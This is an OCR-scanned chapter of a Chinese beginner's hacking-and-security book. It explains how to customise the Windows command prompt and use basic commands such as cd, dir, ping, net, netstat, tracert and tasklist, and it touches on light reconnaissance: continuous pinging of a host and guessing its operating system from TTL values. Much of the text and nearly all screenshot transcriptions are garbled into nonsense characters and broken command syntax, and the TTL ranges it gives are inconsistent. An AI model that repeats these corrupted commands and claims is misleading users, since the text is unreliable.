即 可 完成 粘贴 操作 ,或 者 右 击 “命令 提示 符 ” 
窗口 的 菜单 栏 ， 在 弹出 的 快捷 菜单 中 选择 
“编辑 ”一 “粘贴 ”菜单 命令 ， 也 可 完成 
粘贴 操作 ， 如 下 图 所 示 。 


画 管理 只 ee - 0 x 
ss 还 原 (R) 
RN a 
C:\Users 大 小 (S) nfig 
一 ”最小 化 (N) 
口 最 大 化 (X) 
x 关闭 (CO) 
标 i(O Ctrl-M 
默认 值 (D) 复制 (Y) Enter 
属性 (P) 
全 远 (5) Ctrl-A 
谨 动 (0 
查找 (月 .. Ctrl-F v 


侈 提示 : 当然 如 果 是 想 再 使 用 上 一 条 命令 ， 
可 以 按 F3 键 调 用 ， 要 实现 复杂 的 命令 行 编 
辑 功能 ， 可 以 借助 于 DOSKEY 命令 。 


加 绝招 5: 自 定义 “命令 提示 符 ” 窗 口 的 


风格 


“命令 提示 符 ” 窗 口 的 风格 不 是 一 成 不 
变 的 , 用 户 可 以 通过 “属性 ”菜单 选项 对 “ 命 
令 提 示 符 ”窗口 的 风格 进行 自 定义 设置 ， 
如 设置 窗口 的 颜色 、 字 体 的 样式 等 。 


1. 颜色 

在 ”命令 提示 符 ” 属性 ?对 话 框 中 的 “ 颜 
色 ” 选 项 卡 下 可 以 对 命令 行 “屏幕 文字 ”“ 屏 
幕 背景 ”“ 弹 出 文字 “弹出 窗口 背景 ”的 
颜色 进行 设置 ， 具 体 的 操作 步骤 如 下 。 


[steep 回 单 去 “命令 提示 符 ” 窗 口 左上 角 的 图 
标 ， 在 弹出 菜单 中 选择 “属性 ”选项 ， 即 
可 打开 “ “命令 提示 符 ” 属 性 ”对 话 框 ， 
如 下 图 所 示 。 

硬 "全 $+ 和 层 性 TR 
天 页 字体 “布局 “基色 


光 款 大 小 命 人 记录 
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Oxw 


扬中 区 大 小 (Bh 


回国 | 


六 中 ER(N): 
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回 快 束 绽 各 模式 (Q) 

回 插入 模式 

回 启用 Ctrl 好 快捷 方式 (K) 

回 秆 下 时 信和 芝 贴 板 岂 容 (有 

文 直 运 泽 

回 启 用 对 迁 宇 内 容 写 动 洲 行 (5) 

回 扩展 的 文本 秋 择 纺 00 

当前 代码 页 

936 (ANSVOEM - 简体 中 文 GBK) 


口 便 才 |B 版 控制 台 (需要 重新 启动 )(U) 
了 角 要 多 有 关 和 2 各 8 信息 


Cw 


[tep 图 选择 “颜色 ”选项 卡 ， 在 其 中 可 以 对 
相关 选项 进行 颜色 设置 。 选 中 “屏幕 文字 ?” 
单 选 按钮 ， 可 以 设置 屏幕 文字 的 显示 颜色 ， 
这 里 选择 “黑色 ”， 如 下 图 所 示 。 


而 “会 令 提示 符 " 尾 性 x 


远大 “字体 。 布局 。 可取 

@ mx#m 远志 的 县 色 值 

〇 三 归 (8) Am: [局 
[1] 绿 (G): [2 a 
口 弱 出 斌 D 背 县) au 区 下 


过 十 的 洋 出 罕 D 颜 色 


图 ioox [而 


二 
选中 “屏幕 背景 ” 单 选 按钮 ， 可 以 
设置 屏幕 背景 的 显示 颜色 ， 这 里 选 
择 “ 灰 色 ”， 如 下 图 所 示 。 


国 “命令 提 趟 符 " 尾 性 


选项 字体 ”布局 。 磊 色 


口 屏 蔓 文 字 m) 
图 屏 萌 背 要 (B) 
口 弹出 文字 (P) 
口 弹 出 罕 口 背景 (U) 


计 二 的 基色 全 

红 IR: [242 加 
aaGF |2 和 2 
sa: [22 


选 定 的 弹出 窗口 闫 色 


C:\WINDOWS> dir 
SYSTE <DIR> 


不 透明度 (O) 
30% 


10 


10-01-99 
> 10-01-99 


e 选中 “弹出 文字 ” 单 选 按钮 ， 可 以 
设置 弹出 窗口 文字 的 显示 颜色 ， 这 
里 设置 蓝 色 颜色 值 为 180， 如 下 图 


所 示 。 


国 “命令 提示 符 " 属性 


和 远 项 ”字体 布局 。 顶 色 


口 屏 薪 文 字 (T) 运 十 的 颜色 值 

口 屏 碍 背景 (B) I(R): [| 

国 弹 4 文字 P) Go | 

口 弹 册 罕 哨 时 (U) au [iE 

nual On 

po \WINDOWS> dir 

SYSTEM <DIR> 10-01-99 5:00a 
a 

还 二 的 染 册 窗口 上 色 


> 10-01-99 


10-01-99 


图 100% [100 


第 2 章 Windows 中 的 DOS 窗 口 与 DOS 命 令 


e 选中 “弹出 窗口 背景 ” 单 选 按钮 ， 
可 以 设置 弹出 窗口 的 背景 显示 颜色 ， 
这 里 设置 颜色 值 为 125, 如 下 图 所 示 。 


丽 命令 得 示 符 " 尾 性 x 


运 页 “字体 布局 ”车 色 


口 异 草 文字 远 定 的 配色 值 
口 惰 芋 背景 (B) 红 (R): 
口 弹 出 文字 绿 (Gh: 
轿 漳 刘 背景 (U) i 


TTT 


| 
! 


远 定 的 弹出 窗口 若 色 


30% 是 100% fio0 


[Sep 图 设置 完毕 后 单 击 “确定 ”按钮 ， 即 可 
0 “命令 提示 符 ” 窗 口 如 下 图 所 示 。 
国 管理 只: 命令 提示 符 和 口 x 


A 


:\Users\Administrator>ipconfig 


2. 字体 


在 ““ 命 令 提 示 符 ”属性 ”对 话 框 中 
选择 “字体 ”选项 卡 ， 在 其 中 设置 字体 的 
样式 , 并 可 以 选择 窗口 的 大 小 , 如 下 图 所 示 。 
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黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


而 ` 命 人 坦 示 符 属性 x 4. 选项 
psi 在 “ “命令 提示 符 ” 属 性 ”对 话 框 中 
选择 “选项 ”选项 卡 ， 在 这 里 可 以 设置 光 
| 标 大 小 、 命 令 记录 格式 等 ， 在 “编辑 选项 ” 
四 栏 ， 如 果 选 中 “快速 编辑 模式 ” 复 选 框 ， 
» 那么 在 窗口 中 随时 可 以 对 命令 行进 行 编辑 ， 
pr 如 下 图 所 示 。 
EE 入 | 建议 将 TrueType 字体 用 于 高 
耻 术 体 DPI 里 示 器 ， 因 为 点 阵 字 体 可 而 -六 提示 行 属性 A 
加 守 书 蓄 无 法 清 新 时 示 。 
ms 远 顺 字体 布局 车 色 
所 和 字体 : 新 宋体 . ee ee (B): 50 所 
C: WINDOWS> dir 每 人 字符 为 人 六 中 区 数量 (N): 4 下 
SYSTEM <DIR> J0 8 异 划 你 素 究 Ow 3 
SYSTEM32 DIR> 10 18 肥 疝 党 素 志 口 委 训 | 昌 的 副本 (D) 
README TXT 26926 10 人 
Ca Ee 
回 启 用 Ctrl 键 快 搜 方 式 (K) 
团 类 贴 时 往 迁 筋 贴 板 内 容 (有 
3. 布局 Dr 
团 扩 展 的 文本 远 返 键 (X) 
在 “命令 提示 符 ” 属性 ” 对 话 框 中 Pe 
选择 “布局 ”选项 卡 ， 在 这 里 可 以 对 窗口 
进行 整体 布局 设置 ， 可 以 具体 设置 窗口 的 get 
大 小 、 在 屏幕 中 所 处 的 位 置 以 及 屏幕 缓冲 
区 大 小 。 在 设置 窗口 位 置 时 ， 如 果 选 中 “由 EE 


系统 定位 窗口 " 复 选 框 , 那么 在 启动 DOS 时 ， 
窗口 在 屏幕 中 所 处 的 位 置 由 系统 来 决定 ， 2.2 ”黑客 常用 DOS 命 令 应 用 
如 下 图 所 示 。 

绝招 


熟练 掌握 一 些 DOS 命令 的 应 用 是 一 名 


远 项 ”字体 ”布局 问 色 


2 黑客 的 基本 功 ， 通 过 这 些 DOS 命令 可 以 帮 
高 度 (H): Eo CE 助 用 户 追 踪 黑客 的 踪迹 。 

rg 

硬 口 大 小 - 绝招 6: cd 命令 的 应 用 


宽度 (): 站 


i 号 归 使 用 cd (Change Directory) 命令 可 以 自演 
ee = 改变 当前 目录 ， 该 命令 用 于 切换 路 径 目 录 。 

Im cd 命令 主要 有 以 下 3 种 使 用 方法 。 

sn (1)cd path path 是 路 径 , 如 输入 cd ci\ 命 


令 后 按 Enter 键 或 输入 cd Windows 命令 ， 

即 可 分 别 切换 到 C:\ 和 C:VWindows 目录 下 。 
(2) cd..: cd 后 面 的 两 个 “.” 表 示 返 回 

取消 上 一 级 目录 , 如 当前 的 目录 为 C:\Windows， 


如 果 输 入 cd.. 命令 ， 按 Enter 键 即 可 返回 上 
一 级 目录 ， 即 Ci\。 
(3) cd\: 表示 当前 无 论 在 哪个 子 目录 
下 ， 通 过 该 命令 可 立即 返回 到 根 目录 下 。 
例如 ， 使 用 cd 命令 进入 CNWin- 
dows\system32 子 目录 ， 并 退回 根 目录 的 具 
体操 作 步 又 如 下 。 
step 车 在 “命令 提示 符 ”窗口 中 输入 cd ci\ 命 
令 ， 按 Enter 键 ， 即 可 将 目录 切换 为 Ci\， 
如 下 图 所 示 。 


国 管理 员 : C\WINDOWS\system32\cmd.exe 口 x 


Jicrosoft Windows [版 本 10.0. 17134. 319] 
(ce) 2018 Jicrosoft Corporation。 保 留 所 有 权利 。 


C:\Users\AdministratorYcd c:\ 


ce 


v 


如 果 想 进入 C:\Windows\System32 目 
录 中 ， 则 需 在 上 面 的 “命令 提示 符 ” 窗 口中 
输入 cd Windows\system32 命令 , 按 Enter 键 ， 
即 可 将 目录 切换 为 C:\Windows\System32， 
如 下 图 所 示 。 


国 管理 员 : C\WINDOWS\system32\cmd.exe = 口 x 


Microsoft Windows [版 本 10.0. 17134. 319] 
(c) 2018 Microsoft Corporation。 保 留 所 有 权利 。 


C:\Users\Administrator>cd c:\ 
ciN>cd Windows\system32 
c:\Windows\System32>, 


v 


step 图 如 果 想 返回 上 一 级 目录 , 则 可 以 在 “ 命 
令 提 示 符 ” 窗 口中 输入 cd.. 命令 ， 按 Enter 
键 即 可 ， 如 下 图 所 示 。 


国 管理 员 : C\WINDOWS\system32\cmd.exe 本 口 x 


Jicrosoft Windows [版 本 10. 0. 17134. 319] 
(c) 2018 Microsoft Corporation。 保 留 所 有 权利 。 


C:\Users\Administrator>cd c:\ 
c:\cd Vindows\system32 
c:\Windows\System32>cd. . 


c:\Windows> 


第 2 章 Windows 中 的 DOS 窗 口 与 DOS 命 令 = 一 


[step 园 如 果 想 返回 到 根 目 录 ， 则 可 以 在 “ 命 
令 提 示 符 ”窗口 中 输入 cd\ 命 令 ， 按 Enter 
键 即 可 ， 如 下 图 所 示 。 


而 管理 器: C\WINDOWS\system32\cmd.exe 一 口 X 


Jicrosoft Windows [版 本 10. 0. 17134. 319] 
(c) 2018 Microsoft Corporation。 保 留 所 有 权利 。 


C:NMUsersNAdministrator>cd c:\ 
cl:\>cd Windows\system32 

c: \Windows\System32>cd. . 
c:\Windows>cd\ 

ci 


绝招 7: dir 命 令 的 应 用 


使 用 dir 命令 可 以 列 出 磁盘 上 所 有 的 或 让 
指定 的 文件 目录 ， 主 要 显示 的 内 容 包 含 卷 
标 、 文 件 名 、 文 件 大 小 、 文 件 建立 日 期 和 
时 间 、 目 录 名 、 磁 盘 剩 余 空 间 等 。dir 命令 
的 格式 如 下 。 

dir [ 盘 符 ] [路 径 ] [文件 名 ] [/P] [/W] [/A: 属性 ] 


其 中 ， 各 个 参数 的 作用 如 下 。 

(1) /P: 当 显 示 的 信息 超过 一 屏 时 暂时 
锁定 ， 暂 停 滚动 显示 后 续 的 信息 ， 直 至 按 
任意 键 才 继 续 显 示 下 一 屏 。 

(2) /W: 以 横向 排列 的 形式 显示 文件 
名 和 目录 名 ， 每 行 5 个 〈 不 显示 文件 大 小 、 
建立 日 期 和 时 间 ) 。 

(3) /A: 属性 : 仅 显 示 指 定 属性 的 文件 ， 
无 此 参数 时 ，dir 显示 除 系 统 和 隐 含 文件 外 
的 所 有 文件 。 可 指定 为 以 下 几 种 形式 : 

GO /A:S: 显示 系统 文件 的 信息 。 

@ /A:H: 显示 隐 含 文件 的 信息 。 

@ /A:R: 显示 只 读 文 件 的 信息 。 

@ /A:A: 显示 归档 文件 的 信息 。 

/A:D: 显示 目录 信息 。 

使 用 dir 命令 查看 磁盘 中 文件 信息 的 具 
体操 作 步 又 如 下 。 


step 图 在 “命令 提示 符 ” 窗 口中 输入 dir 命 令 ， 
按 Enter 键 ， 即 可 查看 当前 目录 下 的 文件 列 
表 ， 如 下 图 所 示 。 
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丽 管理 员 : CNWINDOWS\Vsystem32Wmdexe 一 口 4 


Jicrosoft Windows [版 本 10.0. 17134. 319] A 
(c) 2018 Microsoft Corporation。 保 留 所 有 权利 。 


C:\Users\Administrator>dir 
中 的 卷 是 Windows 

| 号 是 2ECC-1807 
C:\Users\Administrator 的 目录 


2018/11/26 12:43 <DIR> 
2018/11/26 12:43 DIR> 


2018/11/26 12:43 <DIR> 3D Objects 
2018/11/26 12:43 <DIR> Contacts 
2018/11/26 12:47 <DIR> Desktop 
2018/11/26 12:43 <DIR> Documents 
2018/11/26 12:43 DIR> Downloads 
2018/11/26 12:43 <DIR> Favorites 
2018/11/26 12:43 <DIR> Links 
2018/11/26 12:43 <DIR> Jusic 
2018/09/19 12:45 <DIR> OneDrive 
2018/11/26 12:43 <DIR> Pictures 
2016/11/28 11:11 <DIR> Roaming 
2018/11/26 12:43 <DIR> Saved Games 
2018/11/26 12:43 <DIR> Searches 
2018/11/26 了 <DIR> ME 


16 ?人 28, 804, 747, 2 冶 用 字 节 


C:\Users\Administrator> 


[step 图 在 “命令 提示 符 ” 窗 口中 输入 dir d:/ a:d 
命令 ， 按 Enter 键 ， 即 可 查看 D 盘 下 的 所 有 
文件 的 目录 ， 如 下 图 所 示 。 


国 管理 员 ; C\WINDOWS\system32\cmd exe = 和 六 
Cs 店员: 拓 加 括 dir d:/ a:d A 


和 -3B52 
D':\ 的 目录 


2017/02/13 13:45 <DIR7 SRECYCLE. BIN 
2017/07/31 16:22 。 <DIR7 -c-a-d2016 注 册 
2018/07/05 18:32 <DIR> 3 

2018/11/20 19:03 。 <DIR7 

2017/07/21 17:28 <DIR> 
2018/11/20 18:50 <DIR> 
2017/07/31 18:33 <DIR> 
2017/07/25 09:45 <DIR> 
解 让 Jvl,5 

2015/06/24 08:53 <DIR> 
2017/11/14 18:27 <DIR> 
2017/02/11 14:34 <DIR> 
i ta 
2017/02/19 > 


Sopoml oags 
360 安 全 浏览 器 下 载 


3Dmax 

Adohe CC 2015 通用 破 
AdobeCC20142015pj 
AdobeDreamweayerCS6 
AutoCAD_2016_Simpli£i 


CamtasiaStudio-v6. 03K 


2017/03/01 19:40 <DIR> TESETOP-RJKNIOC 
2017/03/03 11:27 <DIR> HyperSnap 6 
2017/08/02 18:02 4 Java 
2018/09/21 13:07 < js 

2018/11/20 18:57 < my 

2017/08/03 10:33 JyDrivers 


如 
2017/03/23 11:57 < 
2017/11/10 12:40 <DIR> 


0ffice2016_zh_32Bit 
ofice2016 正 式 版 激活 


Btep 图 在 “命令 提示 符 ” 窗 口中 输入 dir 
cwindows /ah 命令， 按 Enter 键 ， 即 可 列 
出 cvwindows 目录 下 的 隐藏 文件 ， 如 下 图 
所 示 


丽 管 至 呈 : CWWINDOWS\system32\emd.exe = "他 
A ci\windows /a:h ~ 


dt 
和 号 是 | a 
c:\windows 的 目录 


2018/04/12 23:57 <DIR> BitLockerTiseoveryyo 
luneContents 

2018/04/12 07:33 <DIR> ELANBKUP 
2018/11/26 11:03 DIR> Inetaller 


2018/04/12 07:33 DIR> 
2018/04/12 07:34 

t 1 个 3 
TB aa 708, sis 403 HF 


C:\Users\Administrator>— 


Language0verlayCache 
670 ad Jianifes 


14 


绝招 8: ping 命 令 的 应 用 回 
ping 命令 是 TCP/IP 中 最 为 常用 的 命令 入 让 
主要 用 来 检查 网 络 是 否 通畅 或 者 网 
络 连接 的 速度 。 对 于 一 个 黑客 来 说 ，ping 
命令 是 第 一 个 必须 掌握 的 DOS 命令 。 在 “ 命 
令 提示 符 ” 窗 口中 输入 ping /?， 可 以 得 到 
这 条 命令 的 帮助 信息 。 


丽 管理 员 : CWWINDOWS\system32\cemd.exe 一 口 x 
C:\Users\Administratorping /? 四 


用 法 : ping [-t] [-a] [ma count] [1 size] [-£] [si TIL] [-v TOs] 
-r count] [-s count] [[-j host-list] | [-k host-list 


]] 
[-w timeout] [-R] [-S srcaddr] [-c compartment] [-p] 
[-4] [-6] target_name 
选项 : 
查 i 请 键入 Ctrl+Break 
: 
键 14C。 
和 i 从 tr 
~n count 
-1 size 
-f 和 a je 标记 ( 仅 适用 于 IPv4)。 
-i TIL 和 
时 


Ee 


Eh 
让 和 
=r count 1 数 呈 上 的 仅 适 用 于 IPv4) 。 
i i Tpvd) 
与 主机 列表 一 起 使 用 的 严格 产 路 由 ( 仅 适用 于 IPv4) 、 
使 用 ping 命令 对 计算 机 的 连接 状态 进 
行 测试 的 具体 操作 步骤 如 下 。 


EGG 国 使 用 ping 命令 来 判断 计算 机 的 操作 
系统 类 型 。 在 “命令 提示 符 ” 窗 口中 输入 


-k host-list 


ping 192.168.0.130 命令 ， 运 行 结果 如 下 图 
所 示 。 
而 等 理 员 : C\WINDOWS\system32\cmd.exe 一 口 x 


C:\Users\Administratorping 192. 168. 0. 130 
村 930 冲 且 在下 守节 的 
自 192. 168. 0. 130 字 节 =32 
自 192. 168. 0. 130 人 
自 192. 168. 0. 130 : 到 
自 192. 168. 0. 130 的 回 = 

192. 168. 0. on. 的 Ping 统计 | 

数据 包 全 


32 1 《lms TIL= 殉 


已 发 送 = 4， 4 丢失 = 0 (0% 丢失 ) 
< 
C:\Users\Administrator> 
[step 图 在 “命令 提示 符 ” 窗 口中 输入 ping 


192.168.0.130-t-1 128 命令 ， 可 以 不 断 向 某 
台 主 机 发 出 大 量 的 数据 包 ， 如 下 图 所 示 。 


丽 管理 员 : C\WINDOWS\system32\cmd.exe - ping -一 口 x 


C:\Users\Administratorping 192. 168.0. 130 -t -1 128 
正 : Bis 2 1 0,130 具有 128 守节 的 后 扣 : 
0 的 回 《lms TIL=128 


192. 188. 0 130 的 回复 : 18 lns TIL=128 
192. 168. 0. 130 的 回 
192. 168. 0. 130 的 回 
192. 168. 0. 130 的 回 
192. 168. 0. 130 的 回 
192. 168. 0, 130 的 回 
192. 168. 0. 130 的 回 
192. 168. 0. 130 的 回 
192. 168. 0. 130 的 回 
192. 168. 0. 130 的 回 

回 

回 


ky 
总 
名 


=128 时 
128 时 
128 时 
128 时 
128 时 


本 <lms TTL=128 


| 
CN 
SG 


128 时 
128 ls TIL=128 
[Clms TTL=128 


192. 168. 0. 130 的 
192. 168. 0. 130 的 


Fr 


[ates 图 判断 本 台 计 算 机 是 否 与 外 界 网 络 连 
通 。 在 “命令 提示 符 ” 窗 口中 输入 ping 
www.baidu.com 命令 ， 其 运行 结果 如 下 图 所 
示 ， 图 中 说 明 本 台 计 算 机 与 外 界 网 络 连通 。 


丽 管理 员 ; C\WINDOWS\system32\cmd.exe = 加 其 
(c) 2018 Jicrosoft Corporation。 保 留 这 有 权利 。 A 


C:\Users\Administrator>ping ww. baidu. com 
正在 Ping www, wshifen. com [103. 235. 46.39] 具有 32 字 节 的 数据 : 


103. 235. 46, 39 的 回 ; 

0 3 交加 | 

8 器 个 强 多 : =32 
4 


103, 强 加 噶 a Ring 人 de 
返 -时间 
往 和 人 和 位) 于 


上 


=352ms TIL=45 


站 = 


C:\Users\Administrator’, 


[step 园 解析 茶 IP 地 址 的 计算 机 名 。 在 “命令 
提示 符 ” 窗 口中 输入 ping -a 192.168.0.130 
命令 ， 其 运行 结果 如 下 图 所 示 ， 可 知 这 人 台 
主机 的 名 称 为 DESKTOP-RJIKNMOC。 


国 选择 管理 员 : C\WINDOWS\system32\cmd.exe -: 口 x 
C:\Users\AdministratorYping -a 192.168.0.130 ~ 
正 0 DESKTOP-RJENNOC. DHCP HOST [192. 168.0. 130] 具有 32 
192. 168. 0. 130 的 回复 : 宝 节 =32 时 间 《lms TTL=128 
192. 168. 0. 130 的 回 ES 时 国 <lms TTL=128 
192. 168. 0. 130 的 回 Ee 时 国 <lms TTL=128 
自 192. 168. 0. 130 的 回 =32 时 间 <lms TTL=128 


由 
fr 八字 人 也 


a = Oms, = Oms, 


4 丢失 = 0 (0% 丢失 )， 
9 = Ome 


C:\Users\Administrator> 


利用 TTL 值 判 断 操作 系统 类 型 。 由 于 
不 同 的 操作 系统 的 主机 设置 的 TIL 值 是 不 
同 的 ， 所 以 可 以 根据 其 中 TTL 值 来 识别 操 
作 系 统 类 型 。 一 般 情况 下 ， 分 以 下 3 种 : 

(1) TIL=32， 认 为 目标 主机 操作 系统 
为 Windows 95/98。 


第 2 章 Windows 中 的 DOS 窗 口 与 DOS 命 令 


(2) TIL=64~128， 认 为 目标 主机 操作 
系统 为 Windows NT/2000/XP/7/10。 

(3) TITL=128~255 或 者 32~64， 认 为 
目标 主机 操作 系统 为 UNIX/Linux。 


绝招 9: net 命 令 的 应 用 


使 用 net 命令 可 以 查询 网 络 状态 、 共 享 昌 
tote 该 命令 
语法 格式 信息 如 下 。 


NET [ ACCOUNTS | COMPUTER | CONFIG 


1 
CONTINUE | FILE | GROUP | HELP | 
HELPMSG | LOCALGROUP | NAME | PAUSE | 
PRINT | SEND | SESSION | SHARE | START | 
STATISTICS | STOP | TIME | USE | USER | 
VIEW ] 

查询 本 台 计 算 机 开启 哪些 Window 服务 

的 具体 操作 步骤 如 下 。 


[See 国 使 用 met 命令 查看 网 络 状态 。 打 开 “ 命 
ee， 窗口 ， 输 入 net start 命令 ， 如 下 
图 所 示 。 


画 管理 员 : CWWINDOWS\system32\cm... 一 口 x 


Microsoft Windows [版 本 10.0. 17134. 319] 
(c) 2018 Jicrosoft Corporation。 保 留 所 有 权利 。 


C:NUsers\VAdministrator>net startw 


[ep 图 按 Enter 键 , 则 在 打开 的 “命令 提示 符 ” 
窗口 中 可 以 显示 计算 机 所 启动 的 Windows 
服务 ， 如 下 图 所 示 。 


而 管理 员 : C\WINDOWS\system32\cmd.exe -= 口 x 
(c) 2018 icrosoft Corporation。 保留 所 有 权利 。 ~ 


C:\Users\Administratornet start 


已 经 启动 以 下 Windows 服务 : 


Application Information 

AVCTP 服 

Background Intelligent Transfer Service 
Background Tasks Infrastructure Service 
Base Filtering Engine 

BrYNSvc 

Certificate Propagation 

Client License Service (ClipSVC) 

CNG Key Isolation 

CON+ Event System 

Computer Browser 

Connected User Experiences and Telemetry 
Contact Data_lf8b75a4 

Corellessaging 

Credential Nanager 

Cryptographic Services 

Data Sharing Service 

DCON Server Process Launcher 

Delivery Optimization 

Device Association Service 

DHCP Client v 
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绝招 10: netstat 命 令 的 应 用 


netstat 命令 主要 用 来 显示 网 络 连接 的 信 
息 ， 包 括 显 示 活 动 的 TCP 连接 、 路 由 器 和 
网 络 接口 信息 ， 是 一 个 监控 TCP/IP 网 络 非 
常 有 用 的 工具 ， 可 以 让 用 户 得 知 系统 中 目 
前 都 有 哪些 网 络 连接 正常 。 

在 “命令 提示 符 ” 窗 口中 输入 netstat? 
命令 ， 可 以 得 到 这 条 命令 的 帮助 信息 。 


Fa: CNWNDOWswyriemazwmd ee - Oo x 
Ci\earo\Aarinietratornatetat/? 


显示 协议 统计 信息 和 当前 TCP/IP 网 络 十 按 。 
my [-al [-b] [-e] [-£] [~n] [ro] [rp proto] [x] [-s] [~] Eu] [in 
arya 


a 和 


丙 0 ee 
pe 


生息。 此 次 项 可 以 与 -。 选项 
声 i 可 人 ta 全 恨 定 
全 


A 


a pv tp -。 
来 显示 每 个 协议 的 统计 信息 ，proro 可 以 是 下 列 任 何 


prota 


项 一 起 


该 命令 的 语法 格式 如 下 。 


netstat [-a] [-b] [-e] [-n] 
Brotol [rl l=sl T=w] [interval] 


其 中 ， 比 较 重要 的 参数 的 含义 如 下 。 
(1) -a: 显示 所 有 连接 和 监听 端口 。 
(2) -n: 以 数字 形式 显示 地 址 和 端口 号 。 
使 用 netstat 命令 查看 网 络 连接 的 具体 
操作 步骤 如 下 。 
打开 “命令 提示 符 ” 窗 口 ， 在 其 中 输 
入 netstat -n 或 netstat 命令 ， 按 Enter 键 ， 
即 可 查看 服务 器 活动 的 TCP/IP 连接 ， 如 下 
图 所 示 。 


BB Ss: cywINcowsverdtamazend exe - D x 


Lo 


Nininistratornetstat 


外 部 地 址 状态 
IESKTDP-RIKNNOC:49700 © ESTABLISHED 
LESKTOP-RJXNACC: 49702 ESTABLISHED 
DESETOP -RIENNOC: 1521 
1 


ESTAELISHEED 
STHLSENT 


52432 
TEp .192. 168 0 130:52433 


EC:AMUsereVAcininietrator》 
step 图 在 “命令 提示 符 ” 窗 口中 输入 netstat 
工 命令 ， 按 Enter 键 ， 即 可 查看 本 机 的 路 由 
信息 ， 如 下 图 所 示 。 
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laa Ce et} 


Direct Wriual Adapter #2 
nl Adepter 检 


IPv6 路 由 表 


[es 图 在 “命令 提示 符 ” 窗 口中 输入 netstat 
-4a 命令， 按 Enter 键 ， 即 可 查看 本 机 所 有 活 
动 的 TCP 连接 ， 如 下 图 所 示 。 


mB SR; WINDOWS\eyetem32\emd one - 0O x 


shAGniniatratorynetstat -a 


和 
协议 本 地 地 址 外 部 地 址 状态 
Te 00 DESETOP-RJENNOC: LISTENING 
I 6 DESETOP -RTENNOC: 
I DESETOP -RJENNOC: 
TCP 了 -0 
TCP -REIIOC: 
TCP 上 CC: 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 3 站 
TCP DESETOP-RJENNO( Hate 
TCP DESETOP-RJKINO LISTENING 
TCP DESETOP -RJENNOC 
ITCP DESETOP -RJENNOC 
TCP DESETOP -RJENNOC 
TCP DESETOP -RJENNOC 
TCP DESETOP-RJENAOC: 0 
TCP DESETOP -RJENNOC 
TCP DESETOP -RJENNOC 
TCP DESETOP -RJENNOC 
TCP DESETOP -RJENNOC 
TCP DESETOP-RJENNOC: 


Step 加 在 “命令 提示 符 ” 窗 口中 输入 netstat 
-n -a 命令 ， 按 Enter 键 ， 即 可 显示 本 机 所 有 
连接 的 端口 及 其 状态 ， 如 下 图 所 示 。 


SR: WINDOWS\eyctema2\emd ore - 0 x 

C:\Users\Acninistrator’netstat -mn -a 四 

活动 连接 
协议 本 地 地 址 基态 
ICE 0.0 LISTENING 
IF LISTENING 
TCE LISTENING 
TCE LISTENING 
TCE LISTENING 
TCP LISTENING 
TP LISTENING 
TP LISTENING 
TCP LISTENING 
TCP LISTENING 
TCP LISTENING 
TCP LISTENING 
TCP LISTENING 
TCP LISTENING 
TP LISTENING 
TCP LISTENING 
JI LISTENING 
JIE LISTENING 
JI LISUINLMG 
JI LISTENING 
JI 49T00 ESTABLLSHED 
JI 49T02 LSTABLLSHED 
JI LISTENING 
JI LISUINING 
JI LISTINIMG 
I LISTENING 


加 绝招 11: tracert 命 令 的 应 用 


使 用 tracert 命令 可 以 查看 网 络 中 路 由 
节点 信息 ， 最 常见 的 使 用 方法 是 在 tracert 
命令 后 追加 一 个 参数 ， 表 示 检 测 和 查看 连 
接 当前 主机 经 历 了 哪些 路 由 节点 ， 适 用 于 
大 型 网 络 的 测试 ， 该 命令 的 语法 格式 如 下 。 


[-d] [-h MaximumHops] 
[-w Timeout] [TargetName] 


tracert 
Hostlist] 


其 中 ， 各 个 参数 的 含义 如 下 。 

(1) -d: 防止 解析 目标 主机 的 名 字 ， 可 
以 加 速 显示 tracert 命令 结果 。 

(2) -h MaximumHops: 指定 搜索 到 目 
标 地 址 的 最 大 跳跃 数 ， 默 认为 30 个 跳跃 点 。 

(3) -j Hostlist: 按照 主机 列表 中 的 地 
址 释放 源 路 由 。 

(4) -w Timeout: 
默认 单位 为 毫秒 。 

(5) TargetName: 指定 目标 计算 机 。 

例如 ， 如 果 想 查看 www.baidu.com 的 
路 由 与 局 域 网 络 连接 情况 ， 则 在 “命令 提 
示 符 ”窗口 中 输入 tracert www.baidu.com 命 
令 ， 按 Enter 键 ， 其 显示 结果 如 下 图 所 示 。 


而 管理 员 : CG\WINDOWS\system32\cmd.exe - D x 


[=3 


指定 超时 时 间 间 隔 ， 


C:\Users\Administrator>tracert www. baidu. com 


捕 半 最 多 30 个 跃 点 跟踪 
ww wshifen. com [103. 235. 46. 39] 的 路 由 : 


1 1 ms 1 ms 5 ms 192. 168.0.1 

2 12 ms 9 ms 38 ms 172. 16.0.1 

3 22 ms 5 ms 本 222. 83. 34. 105 

4 8 ms 10 ms 9 ms 222. 83. 40. 161 

5 114 ms 77 ms 136 ms 202.97.38,133 

6 53 ms 只 56 ms 202.97.18.206 

7 149m 150 ms 146 ms 202.97.14.254 

8 157 ms 163 ms _155 ms xe-4-0-7.r27. tokyjp05. jp.bb.gin 


-ntt. net [129. 250. 66, 89] 
9 158 ms 158 ms 


ae-1.r30. tokyjp05. jp. bb. gin. ntt 
,net [129. 250. 2. 157] 


10 312 ms。 310 me 314 me ae-5.r24. tkokhk01.hk. bb.gin.ntt 
.net [129. 250. 2.97] 

11 ‘209 ms 224. 208 me ae-1.r03. tkokhk01. hk. bb. gin. ntt 
net [129. 250. 6, 98] 

12 2l3m 234m * ae-l.a0l.newthk03.hk.bb.gin.ntt 
.net [129. 250. 5, 253] 

13 216 me 215ms 218 ms 203.131.254. 138 

14 296 ms 294 ms 286 ms 103,235.45.2 

15 站 四 < ”请 求 超时 。 

16 288 ms 300 ms 287 ms 103.235.46.39 
跟踪 完成 。 
C:\Users\Administrator> > 


县 绝招 12: Tasklist 命 令 的 应 用 


Tasklist 命令 用 来 显示 运行 在 本 地 或 远 
程 计 算 机 上 的 所 有 进程 ， 带 有 多 个 执行 参 


第 2 章 Windows 中 的 DOS 窗 口 与 DOS 命 令 


数 。Tasklist 命令 的 语法 格式 如 下 。 


Tasklist [/S system [/U username [/P 
[password]]]] [/M [module] | /svc | NV] 
[/FI filter] [/FO format] [/NH] 


利用 Tasklist 命令 可 以 查看 本 机 中 的 进 
程 ， 还 可 以 查看 每 个 进程 提供 的 服务 。 下 
面 介绍 使 用 Tasklist 命令 的 具体 操作 步骤 。 
[step 图 在 “命令 提示 符 ” 窗 口中 输入 Tasklist 
